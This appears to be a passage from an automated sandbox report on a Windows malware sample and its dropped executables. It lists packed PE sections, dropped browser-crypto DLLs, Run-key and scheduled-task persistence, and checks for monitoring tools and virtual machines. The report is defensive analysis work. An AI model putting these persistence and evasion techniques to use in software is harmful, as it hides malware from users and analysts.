Source: random[1].exe.0.dr Static PE information: section name: ugypvtkj
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: JKECGDBFCB.exe.0.dr Static PE information: section name:
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .idata
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: hjzxticg
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: ugypvtkj
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name: hjzxticg
Source: skotes.exe.14.dr Static PE information: section name: ugypvtkj
Source: skotes.exe.14.dr Static PE information: section name: .taggant
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: loxwmvpm
Source: random[1].exe.17.dr Static PE information: section name: lrozqijg
Source: random[1].exe.17.dr Static PE information: section name: .taggant
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .idata
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: loxwmvpm
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: lrozqijg
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .taggant
Source: random[2].exe0.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name: .idata
Source: random[2].exe0.17.dr Static PE information: section name: fnclnjqv
Source: random[2].exe0.17.dr Static PE information: section name: xutkjozi
Source: random[2].exe0.17.dr Static PE information: section name: .taggant
Source: 57a07eec2d.exe.17.dr Static PE information: section name:
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .idata
Source: 57a07eec2d.exe.17.dr Static PE information: section name: fnclnjqv
Source: 57a07eec2d.exe.17.dr Static PE information: section name: xutkjozi
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .taggant
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: fsoyaldh
Source: random[1].exe0.17.dr Static PE information: section name: uhxnkltw
Source: random[1].exe0.17.dr Static PE information: section name: .taggant
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .idata
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: fsoyaldh
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: uhxnkltw
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .taggant
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: .idata
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: kcjzlwkt
Source: random[1].exe1.17.dr Static PE information: section name: cwbfsuvm
Source: random[1].exe1.17.dr Static PE information: section name: .taggant
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .idata
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: kcjzlwkt
Source: feb3d39b6a.exe.17.dr Static PE information: section name: cwbfsuvm
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B536 push ecx; ret 0_2_6C50B549
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0052D91C push ecx; ret 14_2_0052D92F
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00521359 push es; ret 14_2_0052135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D4D91C push ecx; ret 15_2_00D4D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D4D91C push ecx; ret 16_2_00D4D92F
Source: file.exe Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.083133220156074
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: entropy: 7.083133220156074
Source: skotes.exe.14.dr Static PE information: section name: entropy: 7.083133220156074
Source: random[1].exe.17.dr Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: random[2].exe0.17.dr Static PE information: section name: entropy: 7.799262699092027
Source: 57a07eec2d.exe.17.dr Static PE information: section name: entropy: 7.799262699092027
Source: random[1].exe0.17.dr Static PE information: section name: fsoyaldh entropy: 7.942516557300243
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: fsoyaldh entropy: 7.942516557300243
Source: random[1].exe1.17.dr Static PE information: section name: entropy: 7.975138897205294
Source: random[1].exe1.17.dr Static PE information: section name: kcjzlwkt entropy: 7.953160073987712
Source: feb3d39b6a.exe.17.dr Static PE information: section name: entropy: 7.975138897205294
Source: feb3d39b6a.exe.17.dr Static PE information: section name: kcjzlwkt entropy: 7.953160073987712

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\JKECGDBFCB.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\JKECGDBFCB.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\JKECGDBFCB.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\JKECGDBFCB.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run feb3d39b6a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 815f2a8fe8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d957dbf73.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 57a07eec2d.exe
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5355F0
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Documents\JKECGDBFCB.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\JKECGDBFCB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
